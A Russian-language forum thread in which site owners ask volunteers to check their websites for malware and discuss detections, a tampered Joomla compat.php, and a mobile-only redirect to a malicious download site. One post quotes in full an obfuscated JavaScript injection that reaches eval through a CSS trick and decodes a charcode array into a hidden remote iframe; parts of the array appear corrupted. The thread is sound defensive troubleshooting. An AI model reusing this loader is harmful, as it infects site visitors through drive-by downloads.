Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
24,588
Реакции
13,563
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например https://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 
Да, нет пока все вроде нормально, сюда написал что бы проверили на всякий случай, поскольку проверив комп все оказалось нормально.
 
Привет!
Люди добрые, помогите разобраться. Яндекс кричит про вредоносный код. Все файлы сайта хттп://loadboard.ru проверены и каспером и drweb и avast и sophos и mcafee. Все чисто. Сегодня код найден, завтра нет. Скрипт следующего содержания:
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#c0','background:url(data:,eval)');var wij=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var bauu=r.cssRules||r.rules;for(var bpio=0;bpio<bauu.length;bpio++){var urnz=bauu.item?bauu.item(bpio):bauu[bpio];if(!urnz.selectorText.match(/#c(\d+)/))continue;wij=urnz.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};} puny=new Date(2010,11,3,2,21,4);t=puny.getSeconds();var rpzc=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,40t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/4/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc);hx.call(nqwy);mv+=hx(nqwy);} qf(mv);</script> </body> </html>

Спасибо.
 
Последнее редактирование модератором:
если не ошибаюсь ругается на кусок из кода идущий с рекламой игры.. скопируйте плиз код из файла scripts/ads папка ads
то есть не папка скрипт вашей cms joomla а именно то что пришло с рекламой
 
прошу прощения за безграмотность, как это можно сделать? через FTP или firebug? и если возможно подробнее.. если через firebug, интуиция подсказывает, что копать нужно в этом направлении?[
 
Последнее редактирование модератором:
да, как понимаю айс код туда инклудится банер..и по ходу траблики с ним..
плюс там заметил странную картинку 12 пикселов белый квадрат *** i.png
 
наткнулся на статью про Trojan-Downloader.HTML.Agent.wy, он же Troj/Iframe-IW здесь: хттп://www.mpcontrol.ru/index.php?option=com_content&view=article&id=72%3A-xmega-&catid=1&Itemid=36
По рекомендации открыл и сравнил с оригиналом файл \libraries\joomla\utilities\compat\compat.php
Он явно отличался. Перезаписал оригиналом, жду от яндекса новостей, потом отпишу помогло или нет.
 
Добрый день.

В последнее время хттп://colorandcode.ru начал блокироваться.

При проверке выдает

Avast JS:ScriptIP-inf [Trj]
GData JS:ScriptIP-inf
Ikarus JS.ScriptIP

а остальные показывают что нет вируса, например
ESET-NOD32 вирусов нет
 
Arbitr, через 3 суток сайт выплыл в яндексе без пометок, вот уже неделя все нормально, причина была в compat.php. Пароли сменил с параноидальной длиной, поставил компонент против sql инъекций и всяких других хреней. Поймать бы того кто это сделал да и отрубить голову.
 
dkzfiles, это делал скорее всего скрипт. Ручным взломом занимаются или дети безголовые по инструкции либо под заказ за большие деньги.
 
В разделе вин 7 была выложена ссылка на victоria, хттп://hdd-911.com/index.php?option=content&task=view&id=27&Itemid=27
Когда перехожу с компа по ссылке то все нормально.
Если с планшетника то сразу срабатывает перенаправление,ставлю антивирь выдает как малварьный ресурс.
При перенаправлении идет предложение все скачать,все обновить...
перенаправление на h t t p://bq-update.com/

На планшете вирья вроде нет-сканировал раными утилами,смотрел потроха системы и процессы,ничего подозрительного+проблема только на том сайте.
картинки прилагаю
 

Вложения

  • 17012013181.jpg
    17012013181.jpg
    33.4 KB · Просмотры: 76
  • малварь.jpg
    малварь.jpg
    23.6 KB · Просмотры: 79
Последнее редактирование модератором:
shestale, тут на анроиде нет хостса.
это не шиндос
с другими сайтами все нормально,проблема только с этим.

Добавлено через 35 минут 47 секунд
по описаниям эта штука атакует сайты и внедряет J2ME/TrojanSMS.Agent.DL через мобильные браузеры.
 
Последнее редактирование:
Сайт заражен.

Есть два варианта:
1. Админ зарабатывает на мобильном трафике
2. Сайт взломан и перенаправляет все мобильные устройства на вредоносный сайт. Смотреть .htaccess нужно.
 
щас гляну.
Сайт временно исключать из публикуемых ссылок?

Добавлено через 8 минут 16 секунд
Смотреть .htaccess нужно.

.htaccess перепутал с андройдовскими файлами.
кстати вирье искать несложно-в системе не так уж и много файлов,левые сразу видно.
 
Исключай. Я не нашел контакты админа того сайта....

Добавлено через 22 секунды
Кстати самое важное можно у нас зазеркалить.
 
Приветствую!
Подскажите, пожалуйста, как решить данную проблему:
На поддомене моего сайта обнаружен вирус, который идентифицируется Авастом как JS: cluder [trj]. Яндекс также прислал письмо о наличии вредоносного кода на этом поддомене.

Поддомен:
хттп://tournament.rhl-mod.ru

Заранее благодарю!
 
Назад
Сверху Снизу